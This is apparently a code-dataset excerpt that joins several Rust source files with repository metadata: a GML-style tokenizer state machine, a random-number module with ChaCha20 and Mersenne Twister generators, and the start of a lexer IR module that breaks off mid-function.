let test = |ok| -> Result<(), FormattedError> { Ok(unit_or_formatable_error(ok)?) };
assert_eq!(test(true), Ok(()));
assert_eq!(
test(false),
Err(FormattedError("FormatableErrorDebug".to_owned()))
);
}
#[test]
fn any_test() {
let test = |ok| -> Result<(), AnyError> { Ok(unit_or_formatable_error(ok)?) };
assert!(test(true).is_ok());
match test(false) {
Ok(_) => panic!("test(false) should never be Ok(_)"),
Err(error) => match error.0.downcast::<FormatableError>() {
Ok(downcasted) => println!("Successfully Downcasted: {:?}", downcasted),
Err(_) => panic!("Couldn't downcast after boxing in AnyError"),
},
}
}
}
| true |
80badab3a5632d5466899430f16a9cb7639be7ba
|
Rust
|
foxfriends/gmlpp
|
/src/gmlpp/tokenizer/state.rs
|
UTF-8
| 16,630 | 3.578125 | 4 |
[] |
no_license
|
use error::Error;
#[derive(Clone, Copy, PartialEq, Eq, Debug)]
pub enum State {
Start,
// comments
SlashSlash,
SlashSlashSlash,
LineComment,
DocComment,
SlashStar(u8),
SlashStarSlash(u8),
SlashStarStar(u8),
// numbers
Zero,
ZeroX,
ZeroB,
Hex,
Bin,
Dec,
DecFloat,
DecE,
DecEMinus,
DecExp,
// strings
CharStart,
CharX,
CharSlash,
Char,
StrStart,
StrSlash,
Str,
// arithmetic operators
Minus,
Plus,
PlusEqual,
MinusEqual,
Star,
StarStar,
Slash,
Percent,
StarEqual,
StarStarEqual,
SlashEqual,
PercentEqual,
PlusPlus,
MinusMinus,
// comparison operators
Equal,
EqualEqual,
NotEqual,
Less,
LessEqual,
More,
MoreEqual,
// boolean operators
And,
AndAnd,
Bar,
BarBar,
Xor,
AndEqual,
BarEqual,
XorEqual,
Tilde,
Bang,
LShift,
LShiftEqual,
RShift,
RShiftEqual,
// symbols
Question,
Colon,
Hash,
At,
Underscore,
BarMore,
Dot,
Comma,
Semi,
DotDot,
DotDotDot,
// preprocessor
HashM,
HashMa,
HashMac,
HashMacr,
HashMacro,
HashP,
HashPr,
HashPra,
HashPrag,
HashPragm,
HashPragma,
// whitespace
EOL,
// brackets
LParen,
RParen,
LBrack,
RBrack,
LBrace,
RBrace,
// identifier
Identifier,
}
impl Default for State {
fn default() -> Self {
State::Start
}
}
impl State {
/// transitions to the next state, given a character
pub fn next(self, c: char) -> Result<Option<Self>, Error> {
use self::State::*;
match self {
Start =>
match c {
'0' => Ok(Some(Zero)),
'(' => Ok(Some(LParen)),
')' => Ok(Some(RParen)),
'{' => Ok(Some(LBrace)),
'}' => Ok(Some(RBrace)),
'[' => Ok(Some(LBrack)),
']' => Ok(Some(RBrack)),
'+' => Ok(Some(Plus)),
'-' => Ok(Some(Minus)),
'*' => Ok(Some(Star)),
'/' => Ok(Some(Slash)),
'%' => Ok(Some(Percent)),
'=' => Ok(Some(Equal)),
'|' => Ok(Some(Bar)),
'&' => Ok(Some(And)),
'^' => Ok(Some(Xor)),
'~' => Ok(Some(Tilde)),
'<' => Ok(Some(Less)),
'>' => Ok(Some(More)),
'!' => Ok(Some(Bang)),
'#' => Ok(Some(Hash)),
'@' => Ok(Some(At)),
'.' => Ok(Some(Dot)),
',' => Ok(Some(Comma)),
'\n' => Ok(Some(EOL)),
'\'' => Ok(Some(CharStart)),
'"' => Ok(Some(StrStart)),
';' => Ok(Some(Semi)),
'_' => Ok(Some(Underscore)),
'?' => Ok(Some(Question)),
':' => Ok(Some(Colon)),
c if c.is_whitespace() => Ok(Some(Start)),
c if c.is_digit(10) => Ok(Some(Dec)),
c if c.is_alphabetic() => Ok(Some(Identifier)),
_ => Err(Error::InvalidCharacter),
}
// numbers
// 0
Zero =>
match c {
'x' => Ok(Some(ZeroX)),
'b' => Ok(Some(ZeroB)),
'_' => Ok(Some(Dec)),
'.' => Ok(Some(DecFloat)),
'e' => Ok(Some(DecE)),
c if c.is_digit(10) => Ok(Some(Dec)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral),
}
// 0x
ZeroX =>
match c {
'_' => Ok(Some(ZeroX)),
c if c.is_digit(16) => Ok(Some(Hex)),
_ => Err(Error::MalformedNumericLiteral),
}
// 0x1
Hex =>
match c {
'_' => Ok(Some(Hex)),
c if c.is_digit(16) => Ok(Some(Hex)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral),
}
// 0b
ZeroB =>
match c {
'_' => Ok(Some(ZeroB)),
c if c.is_digit(2) => Ok(Some(Bin)),
_ => Err(Error::MalformedNumericLiteral),
}
// 0b1
Bin =>
match c {
'_' => Ok(Some(Bin)),
c if c.is_digit(2) => Ok(Some(Bin)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral)
}
// 1
Dec =>
match c {
'_' => Ok(Some(Dec)),
'.' => Ok(Some(DecFloat)),
'e' => Ok(Some(DecE)),
c if c.is_digit(10) => Ok(Some(Dec)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral)
}
// 1.
DecFloat =>
match c {
'_' => Ok(Some(DecFloat)),
'e' => Ok(Some(DecE)),
c if c.is_digit(10) => Ok(Some(DecFloat)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral),
}
// 1.3e
DecE =>
match c {
'-' => Ok(Some(DecEMinus)),
c if c.is_digit(10) => Ok(Some(DecExp)),
_ => Err(Error::MalformedNumericLiteral),
}
// 1.3e-
DecEMinus =>
match c {
c if c.is_digit(10) => Ok(Some(DecExp)),
_ => Err(Error::MalformedNumericLiteral),
}
// 1.3e-5
DecExp =>
match c {
'_' => Ok(Some(DecExp)),
c if c.is_digit(10) => Ok(Some(DecExp)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral),
}
// operators
// /
Slash =>
match c {
'/' => Ok(Some(SlashSlash)),
'=' => Ok(Some(SlashEqual)),
'*' => Ok(Some(SlashStar(1))),
_ => Ok(None),
}
// comments
// //
SlashSlash =>
match c {
'/' => Ok(Some(SlashSlashSlash)),
'\n' => Ok(None),
_ => Ok(Some(LineComment)),
}
// ///
SlashSlashSlash =>
match c {
'\n' => Ok(None),
_ => Ok(Some(DocComment)),
}
// //a
LineComment =>
match c {
'\n' => Ok(None),
_ => Ok(Some(LineComment)),
}
// ///a
DocComment =>
match c {
'\n' => Ok(None),
_ => Ok(Some(DocComment)),
}
// /*
SlashStar(depth) =>
if depth == 0 {
Ok(None)
} else {
match c {
'/' => Ok(Some(SlashStarSlash(depth))),
'*' => Ok(Some(SlashStarStar(depth))),
_ => Ok(Some(SlashStar(depth))),
}
}
// /* *
SlashStarStar(depth) =>
match c {
'/' => Ok(Some(SlashStar(depth - 1))),
'*' => Ok(Some(SlashStarStar(depth))),
_ => Ok(Some(SlashStar(depth))),
}
// /* *
SlashStarSlash(depth) =>
match c {
'/' => Ok(Some(SlashStarSlash(depth))),
'*' =>
if depth == ::std::u8::MAX {
Err(Error::CommentNestingDepth)
} else {
Ok(Some(SlashStar(depth + 1)))
}
_ => Ok(Some(SlashStar(depth))),
}
// '
CharStart =>
match c {
'\\' => Ok(Some(CharSlash)),
'\'' => Err(Error::UnexpectedCharacter),
_ => Ok(Some(CharX)),
}
// 'a
CharX =>
match c {
'\'' => Ok(Some(Char)),
_ => Err(Error::UnexpectedCharacter),
}
// '\
CharSlash => Ok(Some(CharX)),
// 'a'
Char => Ok(None),
// "
StrStart =>
match c {
'"' => Ok(Some(Str)),
'\\' => Ok(Some(StrSlash)),
_ => Ok(Some(StrStart)),
}
// "xx\
StrSlash => Ok(Some(StrStart)),
// "xxx"
Str => Ok(None),
// +
Plus =>
match c {
'+' => Ok(Some(PlusPlus)),
'=' => Ok(Some(PlusEqual)),
_ => Ok(None),
}
// ++
PlusPlus => Ok(None),
// +=
PlusEqual => Ok(None),
// -
Minus =>
match c {
'-' => Ok(Some(MinusMinus)),
'=' => Ok(Some(MinusEqual)),
_ => Ok(None),
}
// --
MinusMinus => Ok(None),
// -=
MinusEqual => Ok(None),
// *
Star =>
match c {
'*' => Ok(Some(StarStar)),
'=' => Ok(Some(StarEqual)),
_ => Ok(None),
},
// **
StarStar =>
match c {
'=' => Ok(Some(StarStarEqual)),
_ => Ok(None),
},
// *=
StarEqual => Ok(None),
StarStarEqual => Ok(None),
// /=
SlashEqual => Ok(None),
// %
Percent =>
match c {
'=' => Ok(Some(PercentEqual)),
_ => Ok(None),
}
// %=
PercentEqual => Ok(None),
// |
Bar =>
match c {
'|' => Ok(Some(BarBar)),
'=' => Ok(Some(BarEqual)),
'>' => Ok(Some(BarMore)),
_ => Ok(None),
}
// ||
BarBar => Ok(None),
// |=
BarEqual => Ok(None),
// &
And =>
match c {
'&' => Ok(Some(AndAnd)),
'=' => Ok(Some(AndEqual)),
_ => Ok(None),
}
// &&
AndAnd => Ok(None),
// &=
AndEqual => Ok(None),
// ^
Xor =>
match c {
'=' => Ok(Some(XorEqual)),
_ => Ok(None),
}
// ^=
XorEqual => Ok(None),
// ~
Tilde => Ok(None),
// !
Bang =>
match c {
'=' => Ok(Some(NotEqual)),
_ => Ok(None),
}
// !=
NotEqual => Ok(None),
// =
Equal =>
match c {
'=' => Ok(Some(EqualEqual)),
_ => Ok(None),
}
// ==
EqualEqual => Ok(None),
// <
Less =>
match c {
'<' => Ok(Some(LShift)),
'=' => Ok(Some(LessEqual)),
_ => Ok(None),
}
// <<
LShift =>
match c {
'=' => Ok(Some(LShiftEqual)),
_ => Ok(None),
}
// <<=
LShiftEqual => Ok(None),
// <=
LessEqual => Ok(None),
// >
More =>
match c {
'>' => Ok(Some(RShift)),
'=' => Ok(Some(MoreEqual)),
_ => Ok(None),
}
// >>
RShift =>
match c {
'=' => Ok(Some(RShiftEqual)),
_ => Ok(None),
},
// >>=
RShiftEqual => Ok(None),
// >=
MoreEqual => Ok(None),
Question => Ok(None),
Colon => Ok(None),
Hash =>
match c {
'm' => Ok(Some(HashM)),
'p' => Ok(Some(HashP)),
_ => Ok(None),
},
At => Ok(None),
Underscore =>
match c {
c if c.is_alphanumeric() => Ok(Some(Identifier)),
_ => Ok(None),
}
BarMore => Ok(None),
Dot =>
match c {
'.' => Ok(Some(DotDot)),
c if c.is_numeric() => Ok(Some(DecFloat)),
_ => Ok(None),
}
DotDot =>
match c {
'.' => Ok(Some(DotDotDot)),
_ => Err(Error::UnexpectedCharacter),
}
DotDotDot =>
match c {
'.' => Err(Error::UnexpectedCharacter),
_ => Ok(None),
}
Comma => Ok(None),
Semi => Ok(None),
// preprocessor
HashM => if c == 'a' { Ok(Some(HashMa)) } else { Err(Error::InvalidPreprocessorDirective) }
HashMa => if c == 'c' { Ok(Some(HashMac)) } else { Err(Error::InvalidPreprocessorDirective) },
HashMac => if c == 'r' { Ok(Some(HashMacr)) } else { Err(Error::InvalidPreprocessorDirective) },
HashMacr => if c == 'o' { Ok(Some(HashMacro)) } else { Err(Error::InvalidPreprocessorDirective) },
HashMacro =>
match c {
'_' => Err(Error::InvalidPreprocessorDirective),
c if c.is_alphanumeric() => Err(Error::InvalidPreprocessorDirective),
_ => Ok(None),
}
HashP => if c == 'r' { Ok(Some(HashPr)) } else { Err(Error::InvalidPreprocessorDirective) },
HashPr => if c == 'a' { Ok(Some(HashPra)) } else { Err(Error::InvalidPreprocessorDirective) },
HashPra => if c == 'g' { Ok(Some(HashPrag)) } else { Err(Error::InvalidPreprocessorDirective) },
HashPrag => if c == 'm' { Ok(Some(HashPragm)) } else { Err(Error::InvalidPreprocessorDirective) },
HashPragm => if c == 'a' { Ok(Some(HashPragma)) } else { Err(Error::InvalidPreprocessorDirective) },
HashPragma =>
match c {
'_' => Err(Error::InvalidPreprocessorDirective),
c if c.is_alphanumeric() => Err(Error::InvalidPreprocessorDirective),
_ => Ok(None),
},
// whitespace
EOL => if c.is_whitespace() { Ok(Some(EOL)) } else { Ok(None) },
// brackets
LParen => Ok(None),
RParen => Ok(None),
LBrack => Ok(None),
RBrack => Ok(None),
LBrace => Ok(None),
RBrace => Ok(None),
Identifier =>
match c {
'_' => Ok(Some(Identifier)),
c if c.is_alphanumeric() => Ok(Some(Identifier)),
_ => Ok(None),
},
}
}
}
| true |
3e0d20701cfdf37b86f18bfa36450dfa45c03b38
|
Rust
|
dennisss/dacha
|
/pkg/crypto/src/random.rs
|
UTF-8
| 19,238 | 2.90625 | 3 |
[
"Apache-2.0"
] |
permissive
|
use alloc::boxed::Box;
use std::f64::consts::PI;
use std::num::Wrapping;
use std::sync::Arc;
use std::vec::Vec;
use common::bytes::{Buf, Bytes};
use common::io::Readable;
use common::{ceil_div, errors::*};
use executor::sync::Mutex;
use file::LocalFile;
use math::big::{BigUint, SecureBigUint};
use math::integer::Integer;
use crate::chacha20::*;
const MAX_BYTES_BEFORE_RESEED: usize = 1024 * 1024 * 1024; // 1GB
lazy_static! {
static ref GLOBAL_RNG_STATE: GlobalRng = GlobalRng::new();
}
/// Gets a lazily initialized reference to a globally shared random number
/// generator.
///
/// This is seeded on the first random generation.
///
/// The implementation can be assumed to be secure for cryptographic purposes
/// but may not be very fast.
///
/// TODO: We should disallow re-seeding this RNG.
pub fn global_rng() -> GlobalRng {
GLOBAL_RNG_STATE.clone()
}
/// Call me if you want a cheap but insecure RNG seeded by the current system
/// time.
pub fn clocked_rng() -> MersenneTwisterRng {
let mut rng = MersenneTwisterRng::mt19937();
let seed = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap()
.subsec_nanos();
rng.seed_u32(seed);
rng
}
/// Generates secure random bytes suitable for cryptographic key generation.
/// This will wait for sufficient entropy to accumulate in the system.
///
/// Once done, the provided buffer will be filled with the random bytes to the
/// end.
pub async fn secure_random_bytes(buf: &mut [u8]) -> Result<()> {
// See http://man7.org/linux/man-pages/man7/random.7.html
// TODO: Reuse the file handle across calls.
let mut f = LocalFile::open("/dev/random")?;
f.read_exact(buf).await?;
Ok(())
}
/// Securely generates a random value in the range '[lower, upper)'.
///
/// This is implemented to give every integer in the range the same probabiity
/// of being output.
///
/// NOTE: Both the 'lower' and 'upper' numbers should be publicly known for this
/// to be secure.
///
/// The output integer will have the same width as the 'upper' integer.
pub async fn secure_random_range(
lower: &SecureBigUint,
upper: &SecureBigUint,
) -> Result<SecureBigUint> {
if upper.byte_width() == 0 || upper <= lower {
return Err(err_msg("Invalid upper/lower range"));
}
let mut buf = vec![];
buf.resize(upper.byte_width(), 0);
let mut num_bytes = ceil_div(upper.value_bits(), 8);
let msb_mask: u8 = {
let r = upper.value_bits() % 8;
if r == 0 {
0xff
} else {
!((1 << (8 - r)) - 1)
}
};
// TODO: Refactor out retrying. Instead shift to 0
loop {
secure_random_bytes(&mut buf[0..num_bytes]).await?;
buf[num_bytes - 1] &= msb_mask;
let n = SecureBigUint::from_le_bytes(&buf);
// TODO: This *must* be a secure comparison (which it isn't right now).
if &n >= lower && &n < upper {
return Ok(n);
}
}
}
pub trait Rng {
fn seed_size(&self) -> usize;
fn seed(&mut self, new_seed: &[u8]);
fn generate_bytes(&mut self, output: &mut [u8]);
}
#[async_trait]
pub trait SharedRng: 'static + Send + Sync {
/// Number of bytes used to seed this RNG.
fn seed_size(&self) -> usize;
/// Should reset the state of the RNG based on the provided seed.
/// Calling generate_bytes after calling reseed with the same seed should
/// always produce the same result.
async fn seed(&self, new_seed: &[u8]);
async fn generate_bytes(&self, output: &mut [u8]);
}
#[derive(Clone)]
pub struct GlobalRng {
state: Arc<GlobalRngState>,
}
struct GlobalRngState {
bytes_since_reseed: Mutex<usize>,
rng: ChaCha20RNG,
}
impl GlobalRng {
fn new() -> Self {
Self {
state: Arc::new(GlobalRngState {
bytes_since_reseed: Mutex::new(std::usize::MAX),
rng: ChaCha20RNG::new(),
}),
}
}
}
#[async_trait]
impl SharedRng for GlobalRng {
fn seed_size(&self) -> usize {
0
}
async fn seed(&self, _new_seed: &[u8]) {
// Global RNG can't be manually reseeding
panic!();
}
async fn generate_bytes(&self, output: &mut [u8]) {
{
let mut counter = self.state.bytes_since_reseed.lock().await;
if *counter > MAX_BYTES_BEFORE_RESEED {
let mut new_seed = vec![0u8; self.state.rng.seed_size()];
secure_random_bytes(&mut new_seed).await.unwrap();
self.state.rng.seed(&new_seed).await;
*counter = 0;
}
// NOTE: For now we ignore the case of a user requesting a quantity that
// partially exceeds our max threshold.
*counter += output.len();
}
self.state.rng.generate_bytes(output).await
}
}
#[async_trait]
impl<R: Rng + Send + ?Sized + 'static> SharedRng for Mutex<R> {
fn seed_size(&self) -> usize {
todo!()
// self.lock().await.seed_size()
}
async fn seed(&self, new_seed: &[u8]) {
self.lock().await.seed(new_seed)
}
async fn generate_bytes(&self, output: &mut [u8]) {
self.lock().await.generate_bytes(output)
}
}
/// Sample random number generator based on ChaCha20
///
/// - During initialization and periodically afterwards, we (re-)generate the
/// 256-bit key from a 'true random' source (/dev/random).
/// - When a key is selected, we reset the nonce to 0.
/// - The nonce is incremented by 1 for each block we encrypt.
/// - The plaintext to be encrypted is the system time at key creation in
/// nanoseconds.
/// - All of the above are re-seeding in the background every 30 seconds.
/// - Random bytes are generated by encrypting the plaintext with the current
/// nonce and key.
pub struct ChaCha20RNG {
state: Mutex<ChaCha20RNGState>,
}
#[derive(Clone)]
struct ChaCha20RNGState {
key: [u8; CHACHA20_KEY_SIZE],
nonce: u64,
plaintext: [u8; CHACHA20_BLOCK_SIZE],
}
impl ChaCha20RNG {
/// Creates a new instance of the rng with a fixed 'zero' seed.
pub fn new() -> Self {
Self {
state: Mutex::new(ChaCha20RNGState {
key: [0u8; CHACHA20_KEY_SIZE],
nonce: 0,
plaintext: [0u8; CHACHA20_BLOCK_SIZE],
}),
}
}
}
#[async_trait]
impl SharedRng for ChaCha20RNG {
fn seed_size(&self) -> usize {
CHACHA20_KEY_SIZE + CHACHA20_BLOCK_SIZE
}
async fn seed(&self, new_seed: &[u8]) {
let mut state = self.state.lock().await;
state.nonce = 0;
state.key.copy_from_slice(&new_seed[0..CHACHA20_KEY_SIZE]);
state
.plaintext
.copy_from_slice(&new_seed[CHACHA20_KEY_SIZE..]);
}
async fn generate_bytes(&self, mut output: &mut [u8]) {
let state = {
let mut guard = self.state.lock().await;
let cur_state = guard.clone();
guard.nonce += 1;
cur_state
};
let mut nonce = [0u8; CHACHA20_NONCE_SIZE];
nonce[0..8].copy_from_slice(&state.nonce.to_ne_bytes());
let mut chacha = ChaCha20::new(&state.key, &nonce);
while !output.is_empty() {
let mut output_block = [0u8; CHACHA20_BLOCK_SIZE];
chacha.encrypt(&state.plaintext, &mut output_block);
let n = std::cmp::min(output_block.len(), output.len());
output[0..n].copy_from_slice(&output_block[0..n]);
output = &mut output[n..];
}
}
}
#[async_trait]
pub trait SharedRngExt {
async fn shuffle<T: Send + Sync>(&self, elements: &mut [T]);
async fn uniform<T: RngNumber>(&self) -> T;
async fn between<T: RngNumber>(&self, min: T, max: T) -> T;
}
#[async_trait]
impl<R: SharedRng + ?Sized> SharedRngExt for Arc<R> {
async fn shuffle<T: Send + Sync>(&self, elements: &mut [T]) {
self.as_ref().shuffle(elements).await
}
async fn uniform<T: RngNumber>(&self) -> T {
self.as_ref().uniform().await
}
async fn between<T: RngNumber>(&self, min: T, max: T) -> T {
self.as_ref().between(min, max).await
}
}
#[async_trait]
impl<R: SharedRng + ?Sized> SharedRngExt for R {
async fn shuffle<T: Send + Sync>(&self, elements: &mut [T]) {
for i in 0..elements.len() {
let j = self.uniform::<usize>().await % elements.len();
elements.swap(i, j);
}
}
async fn uniform<T: RngNumber>(&self) -> T {
let mut buf = T::Buffer::default();
self.generate_bytes(buf.as_mut()).await;
T::uniform_buffer(buf)
}
async fn between<T: RngNumber>(&self, min: T, max: T) -> T {
let mut buf = T::Buffer::default();
self.generate_bytes(buf.as_mut()).await;
T::between_buffer(buf, min, max)
}
}
pub trait RngNumber: Send + Sync + 'static {
type Buffer: Send + Sync + Sized + Default + AsMut<[u8]>;
fn uniform_buffer(random: Self::Buffer) -> Self;
fn between_buffer(random: Self::Buffer, min: Self, max: Self) -> Self;
}
macro_rules! ensure_positive {
($value:ident, I) => {
if $value < 0 {
$value * -1
} else {
$value
}
};
($value:ident, U) => {
$value
};
}
macro_rules! impl_rng_number_integer {
($num:ident, $type_prefix:ident) => {
impl RngNumber for $num {
type Buffer = [u8; std::mem::size_of::<$num>()];
fn uniform_buffer(random: Self::Buffer) -> Self {
Self::from_le_bytes(random)
}
fn between_buffer(random: Self::Buffer, min: Self, max: Self) -> Self {
assert!(max >= min);
let mut num = Self::uniform_buffer(random);
// In rust (negative_number % positive_number) = negative_number
num = ensure_positive!(num, $type_prefix);
// Convert to [0, range)
let range = max - min;
num = num % range;
// Convert to [min, max)
num += min;
num
}
}
};
}
impl_rng_number_integer!(u8, U);
impl_rng_number_integer!(i8, I);
impl_rng_number_integer!(u16, U);
impl_rng_number_integer!(i16, I);
impl_rng_number_integer!(u32, U);
impl_rng_number_integer!(i32, I);
impl_rng_number_integer!(u64, U);
impl_rng_number_integer!(i64, I);
impl_rng_number_integer!(usize, U);
impl_rng_number_integer!(isize, I);
macro_rules! impl_rng_number_float {
($float_type:ident, $int_type:ident, $fraction_bits:expr, $zero_exponent:expr) => {
impl RngNumber for $float_type {
type Buffer = [u8; std::mem::size_of::<$float_type>()];
fn uniform_buffer(random: Self::Buffer) -> Self {
Self::from_le_bytes(random)
}
fn between_buffer(mut random: Self::Buffer, min: Self, max: Self) -> Self {
assert!(max >= min);
let mut num = $int_type::from_le_bytes(random);
// Clear the sign and exponent bits.
num &= (1 << $fraction_bits) - 1;
// Set the exponent to '0'. So the number will be (1 + fraction) * 2^0
num |= $zero_exponent << $fraction_bits;
random = num.to_le_bytes();
// This will in the range [0, 1).
let f = Self::from_le_bytes(random) - 1.0;
// Convert to [min, max).
let range = max - min;
f * range + min
}
}
};
}
impl_rng_number_float!(f32, u32, 23, 127);
impl_rng_number_float!(f64, u64, 52, 1023);
pub trait RngExt {
fn shuffle<T>(&mut self, elements: &mut [T]);
fn uniform<T: RngNumber>(&mut self) -> T;
fn between<T: RngNumber>(&mut self, min: T, max: T) -> T;
fn choose<'a, T>(&mut self, elements: &'a [T]) -> &'a T;
}
impl<R: Rng + ?Sized> RngExt for R {
fn shuffle<T>(&mut self, elements: &mut [T]) {
for i in 0..elements.len() {
let j = self.uniform::<usize>() % elements.len();
elements.swap(i, j);
}
}
/// Returns a completely random number anywhere in the range of the number
/// type. Every number is equally probably of occuring.
fn uniform<T: RngNumber>(&mut self) -> T {
let mut buf = T::Buffer::default();
self.generate_bytes(buf.as_mut());
T::uniform_buffer(buf)
}
/// Returns a uniform random number in the range [min, max).
///
/// Limitations:
/// - 'max' must be >= 'min'.
/// - For signed integer types for N bits, 'max' - 'min' must fit in N-1
/// bits.
fn between<T: RngNumber>(&mut self, min: T, max: T) -> T {
let mut buf = T::Buffer::default();
self.generate_bytes(buf.as_mut());
T::between_buffer(buf, min, max)
}
fn choose<'a, T>(&mut self, elements: &'a [T]) -> &'a T {
assert!(!elements.is_empty(), "Choosing from empty list");
let n = self.uniform::<usize>();
&elements[n % elements.len()]
}
}
pub const MT_DEFAULT_SEED: u32 = 5489;
pub struct MersenneTwisterRng {
w: u32,
n: usize,
m: usize,
r: u32,
a: u32, //
b: u32,
c: u32,
s: u32,
t: u32,
u: u32,
d: u32,
l: u32,
f: u32,
x: Vec<u32>,
index: usize,
}
impl MersenneTwisterRng {
// TODO: Add a simple time seeded implementation.
pub fn mt19937() -> Self {
Self {
w: 32,
n: 624,
m: 397,
r: 31,
a: 0x9908B0DF,
u: 11,
d: 0xffffffff,
s: 7,
b: 0x9D2C5680,
t: 15,
c: 0xEFC60000,
l: 18,
f: 1812433253,
x: vec![],
index: 0,
}
}
pub fn seed_u32(&mut self, seed: u32) {
self.x.resize(self.n, 0);
self.index = self.n;
self.x[0] = seed;
for i in 1..self.n {
self.x[i] = (self.x[i - 1] ^ (self.x[i - 1] >> (self.w - 2)))
.wrapping_mul(self.f)
.wrapping_add(i as u32);
}
}
pub fn next_u32(&mut self) -> u32 {
if self.x.is_empty() {
self.seed_u32(MT_DEFAULT_SEED);
}
if self.index >= self.n {
self.twist();
}
let mut y = self.x[self.index];
y ^= (y >> self.u) & self.d;
y ^= (y << self.s) & self.b;
y ^= (y << self.t) & self.c;
y ^= y >> self.l;
self.index += 1;
y
}
fn twist(&mut self) {
let w_mask = 1u32.checked_shl(self.w).unwrap_or(0).wrapping_sub(1);
let upper_mask = (w_mask << self.r) & w_mask;
let lower_mask = (!upper_mask) & w_mask;
self.index = 0;
for i in 0..self.n {
let x = (self.x[i] & upper_mask) | (self.x[(i + 1) % self.x.len()] & lower_mask);
let mut x_a = x >> 1;
if x & 1 != 0 {
x_a = x_a ^ self.a;
}
self.x[i] = self.x[(i + self.m) % self.x.len()] ^ x_a;
}
}
}
impl Rng for MersenneTwisterRng {
fn seed_size(&self) -> usize {
std::mem::size_of::<u32>()
}
fn seed(&mut self, new_seed: &[u8]) {
assert_eq!(new_seed.len(), std::mem::size_of::<u32>());
let seed_num = u32::from_le_bytes(*array_ref![new_seed, 0, 4]);
self.seed_u32(seed_num);
}
fn generate_bytes(&mut self, output: &mut [u8]) {
// NOTE: All of the 4's in here are std::mem::size_of::<u32>()
let n = output.len() / 4;
let r = output.len() % 4;
for i in 0..n {
*array_mut_ref![output, 4 * i, 4] = self.next_u32().to_le_bytes();
}
if r != 0 {
let v = self.next_u32().to_le_bytes();
let i = output.len() - r;
output[i..].copy_from_slice(&v[0..r]);
}
}
}
pub struct FixedBytesRng {
data: Bytes,
}
impl FixedBytesRng {
pub fn new<T: Into<Bytes>>(data: T) -> Self {
Self { data: data.into() }
}
}
impl Rng for FixedBytesRng {
fn seed_size(&self) -> usize {
panic!();
}
fn seed(&mut self, _new_seed: &[u8]) {
panic!();
}
fn generate_bytes(&mut self, output: &mut [u8]) {
if output.len() > self.data.len() {
panic!();
}
output.copy_from_slice(&self.data[0..output.len()]);
self.data.advance(output.len());
}
}
pub struct NormalDistribution {
mean: f64,
stddev: f64,
next_number: Option<f64>,
}
impl NormalDistribution {
pub fn new(mean: f64, stddev: f64) -> Self {
Self {
mean,
stddev,
next_number: None,
}
}
/// Given two uniformly sampled random numbers in the range [0, 1], computes
/// two independent random values with a normal/gaussian distribution
/// with mean of 0 and standard deviation of 1.
/// See https://en.wikipedia.org/wiki/Box%E2%80%93Muller_transform
fn box_muller_transform(u1: f64, u2: f64) -> (f64, f64) {
let theta = 2.0 * PI * u2;
let (sin, cos) = theta.sin_cos();
let r = (-2.0 * u1.ln()).sqrt();
(r * sin, r * cos)
}
}
pub trait NormalDistributionRngExt {
fn next(&mut self, rng: &mut dyn Rng) -> f64;
}
impl NormalDistributionRngExt for NormalDistribution {
fn next(&mut self, rng: &mut dyn Rng) -> f64 {
if let Some(v) = self.next_number.take() {
return v;
}
let u1 = rng.between(0.0, 1.0);
let u2 = rng.between(0.0, 1.0);
let (z1, z2) = Self::box_muller_transform(u1, u2);
self.next_number = Some(z2);
z1
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn mersenne_twister_test() -> Result<()> {
let mut rng = MersenneTwisterRng::mt19937();
rng.seed_u32(1234);
let data = std::fs::read_to_string(project_path!("testdata/mt19937.txt"))?;
for (i, line) in data.lines().enumerate() {
let expected = line.parse::<u32>()?;
assert_eq!(rng.next_u32(), expected, "Mismatch at index {}", i);
}
Ok(())
}
#[test]
fn between_inclusive_test() {
let mut rng = MersenneTwisterRng::mt19937();
rng.seed_u32(1234);
for _ in 0..100 {
let f = rng.between::<f32>(0.0, 1.0);
assert!(f >= 0.0 && f < 1.0);
}
for _ in 0..100 {
let f = rng.between::<f64>(0.0, 0.25);
assert!(f >= 0.0 && f < 0.25);
}
let min = 427;
let max = 674;
let num_iter = 20000000;
let mut buckets = [0usize; 247];
for _ in 0..num_iter {
let n = rng.between::<i32>(min, max);
assert!(n >= min && n < max);
buckets[(n - min) as usize] += 1;
}
for bucket in buckets {
// Ideal value is num_iter / range = ~80971
// We'll accept a 1% deviation.
assert!(bucket > 71254 && bucket < 81780, "Bucket is {}", bucket);
}
}
}
| true |
60f7434b3a2c36018a137dca8c1b124f0dce58f4
|
Rust
|
Atul9/sana
|
/sana_core/src/ir.rs
|
UTF-8
| 12,529 | 3.03125 | 3 |
[
"MIT"
] |
permissive
|
use std::{ops::Not, collections::VecDeque};
use crate::automata::{Automata, NodeKind, State};
/// An intermediate representation
#[derive(Debug, Clone)]
pub struct Ir<T> {
pub blocks: Vec<Block<T>>
}
#[derive(Debug, Clone)]
pub enum Block<T> {
Block(Vec<Op<T>>),
Func(Vec<Op<T>>),
}
impl<T> Block<T> {
fn push(&mut self, op: Op<T>) {
match self {
Block::Block(ops)
| Block::Func(ops) =>
ops.push(op)
}
}
fn ops(&self) -> &[Op<T>] {
match self {
Block::Block(ops)
| Block::Func(ops) =>
ops
}
}
}
/// IR opcodes
#[derive(Debug, Clone, PartialEq)]
pub enum Op<T> {
/// Shift the cursor to the next character
Shift,
/// Jump if matches
JumpMatches {
from: char,
to: char,
on_success: usize,
},
/// Jump if not matches
JumpNotMatches {
from: char,
to: char,
on_failure: usize,
},
LoopMatches {
from: char,
to: char,
},
/// Just jump
Jump(usize),
/// Set current action
Set(T),
/// Halt and return an action, if any
Halt,
}
#[derive(Debug, Clone)]
pub struct PrettyIr<'a, T>(&'a Ir<T>);
impl<'a, T: std::fmt::Display> std::fmt::Display for PrettyIr<'a, T> {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
for (i, block) in self.0.blocks.iter().enumerate() {
match block {
Block::Block(ops) => {
writeln!(f, "l{}:", i)?;
for op in ops { fmt_op(op, f)? }
},
Block::Func(ops) => {
